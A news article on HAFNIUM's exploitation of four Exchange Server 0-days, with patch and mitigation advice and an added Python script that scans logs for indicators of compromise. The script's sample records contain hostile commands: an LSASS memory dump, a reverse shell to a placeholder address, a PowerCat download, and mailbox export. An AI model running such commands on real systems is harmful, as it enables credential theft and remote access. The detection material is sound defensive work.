Microsoft Pushes Urgent Updates for Exchange Server After the Discovery of Multiple 0-Days

  • Microsoft has fixed several 0-day flaws that Chinese hackers were exploiting.
  • The vulnerabilities were chained together to achieve a high-level compromise, data access, and exfiltration.
  • The actors had been operating undeterred for at least two months, so updating now is urgent.

Microsoft has confirmed multiple 0-day vulnerabilities in Exchange Server that are being actively exploited by an actor it calls “HAFNIUM.” This is a group of hackers that primarily targets US-based entities and is believed to be state-sponsored and operating out of China.

While the attacks appear to be limited in scope according to Microsoft, they were very damaging: the hackers may have accessed email accounts through compromised Exchange servers, could have installed malware, and may have planted web shell backdoors to retain access and move around the network.

The IDs of the newly discovered 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which are addressed in the latest update. The affected Exchange Server versions are 2013, 2016, and 2019. The actors chained these flaws to carry out a powerful attack, which is indicative of their sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three aren’t related to the HAFNIUM attacks.

If you’re unable to apply the patch right now, you can mitigate by placing the Exchange server behind a VPN so it is not reachable from the internet. Note that this only stops the first step of the attack, which is to establish an untrusted connection to the Exchange server on port 443. Still, it may be enough to disrupt the attack chain. If the attacker has already compromised your server, though, this mitigation won’t make any difference whatsoever.

As Microsoft details, HAFNIUM performed the following post-exploitation activity:

  • Used Procdump to dump the LSASS process memory
  • Used 7-Zip to compress and exfiltrate stolen data
  • Added and used Exchange PowerShell snap-ins to export mailbox data
  • Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
  • Downloaded PowerCat straight from GitHub and used it to open a remote server connection

Thus, if you are an Exchange server admin, treat the activity above as signs of trouble and actively scan your log files for these indicators of compromise. If you find any ZIP, RAR, or 7z files under C:\ProgramData\, treat your data as exfiltrated. According to Microsoft, the actors like to download the Exchange offline address book, so they grab organization and user information too.
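As an added example, not code from the article, Microsoft or Volexity, the script below turns the post-exploitation list above into a small log triage routine: it runs one pattern per listed behaviour over constructed sample log records and flags archives under C:\ProgramData\. The record layout, the regexes, the 203.0.113.9 address and the github.com/example URL are all assumptions made for the sample.

```python
import re

# Constructed sample records (not real HAFNIUM telemetry): process-creation and
# PowerShell entries in the shape an Exchange admin might collect from a host.
SAMPLE_LOGS = [
    "2021-03-02T10:03:45 ProcessCreate cmd=procdump64.exe -ma lsass.exe C:\\ProgramData\\ls.dmp",
    "2021-03-02T10:05:01 ProcessCreate cmd=7z.exe a C:\\ProgramData\\oab.7z C:\\ProgramData\\oab",
    "2021-03-02T10:06:30 PowerShell cmd=Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn",
    "2021-03-02T10:07:02 PowerShell cmd=New-MailboxExportRequest -Mailbox ceo -FilePath \\\\srv\\x.pst",
    "2021-03-02T10:08:00 PowerShell cmd=Invoke-PowerShellTcpOneLine -Reverse -IPAddress 203.0.113.9",
    "2021-03-02T10:09:15 PowerShell cmd=iwr https://github.com/example/powercat/raw/powercat.ps1",
    "2021-03-02T10:10:00 ProcessCreate cmd=notepad.exe C:\\Users\\admin\\notes.txt",
]
# Constructed listing of C:\ProgramData on the same host.
SAMPLE_PROGRAMDATA = [
    "C:\\ProgramData\\Microsoft\\Windows\\Caches\\x.db",
    "C:\\ProgramData\\oab.7z",
    "C:\\ProgramData\\mail.zip",
]
# One pattern per post-exploitation behaviour the article lists (assumed forms).
INDICATORS = {
    "lsass_dump_procdump": re.compile(r"\bprocdump(?:64)?\b.*\blsass\b", re.I),
    "7zip_staging": re.compile(r"\b7z(?:\.exe)?\b.*\.(?:7z|zip)\b", re.I),
    "exchange_snapin": re.compile(r"Add-PSSnapin\s+Microsoft\.Exchange\.", re.I),
    "mailbox_export": re.compile(r"\bNew-MailboxExportRequest\b", re.I),
    "nishang_reverse_shell": re.compile(r"Invoke-PowerShellTcpOneLine", re.I),
    "powercat_download": re.compile(r"github\.com\S*powercat", re.I),
}
# Archives left under C:\ProgramData\ are the exfiltration sign the article calls out.
STAGED_ARCHIVE = re.compile(r"^C:\\ProgramData\\.*\.(?:zip|rar|7z)$", re.I)

def scan_logs(lines):
    """Return (timestamp, indicator, record) for every record matching an indicator."""
    hits = []
    for line in lines:
        ts = line.split(" ", 1)[0]
        hits += [(ts, name, line) for name, pat in INDICATORS.items() if pat.search(line)]
    return hits

def find_staged_archives(paths):
    return [p for p in paths if STAGED_ARCHIVE.match(p)]

def triage(lines, paths):
    """Distinct behaviours seen, earliest hit (where the timeline starts), staged archives."""
    hits = scan_logs(lines)
    return {
        "behaviours": sorted({name for _, name, _ in hits}),
        "first_seen": min((ts for ts, _, _ in hits), default=None),
        "staged_archives": find_staged_archives(paths),
    }
```

A single hit on any one pattern is worth investigating on its own; several of them on one host within minutes, plus fresh archives in C:\ProgramData\, is the combination the article describes.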

If you find that you’re already under attack by HAFNIUM, check out this piece to learn how to build effective defenses. The most urgent action to take right now, though, is to update all externally facing Exchange servers.

Finally, according to a blog post by Volexity researchers, who were the ones to discover these attacks and report them to Microsoft, the first signs of active exploitation of the aforementioned flaws appeared as far back as January 6, 2021.
